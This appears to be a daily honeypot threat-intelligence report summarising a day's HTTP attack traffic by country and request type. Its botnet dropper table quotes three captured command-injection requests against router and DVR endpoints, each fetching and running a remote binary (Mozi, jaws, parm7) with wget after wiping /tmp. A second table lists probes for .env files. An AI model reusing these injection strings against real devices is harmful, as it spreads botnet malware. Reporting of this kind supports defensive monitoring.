Skip to main content
  1. Daily-Posts/

Report: 2025-06-02

·353 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-02
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1375 requests were recorded during the day, originating from 3 different countries, with a peak of 318 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
HKGermany
SGGermany
JPGermany
USGermany
USDubai
FRIsrael
MDIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
103.207.125.80GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
88.247.29.37GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
176.65.148.234POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F141.98.11.175%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20router HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1184CONNECT packetsdatabase.com:443 HTTP/1.1
1233GET /APPS/.env HTTP/1.1
2191GET /Nmap/folder/check1748876450 HTTP/1.1
3011GET /socket.io/1/?t=1748841403604 HTTP/1.1
3801GET /NmapUpperCheck1748876450 HTTP/1.1
4021GET /BkmB HTTP/1.1
4271GET /nmaplowercheck1748876450 HTTP/1.1
4311GET /nmaplowercheck1748853379 HTTP/1.1
4321GET /NmapUpperCheck1748853379 HTTP/1.1
4331GET /Nmap/folder/check1748853379 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0318BG
1206US
2147GB
395CN
484DE
582JP
651HK
748KZ
839IN
937NL
1034FR
1126PL
1223CH
1322EE
1420MD
1518SC
1616GH
1714NG
1813AU
1912AO
2010RO
218PT
227VN
237BR
246BE
256SG
263TH
273CA
283ZA
292DK
302RU
312MN
322KW
332IR
342IE
351ES
361IT
371TR
381IL
391ID

Related

Report: 2025-06-01
·345 words
Repport Daily
Report: 2025-05-31
·303 words
Repport Daily
Report: 2025-05-30
·323 words
Repport Daily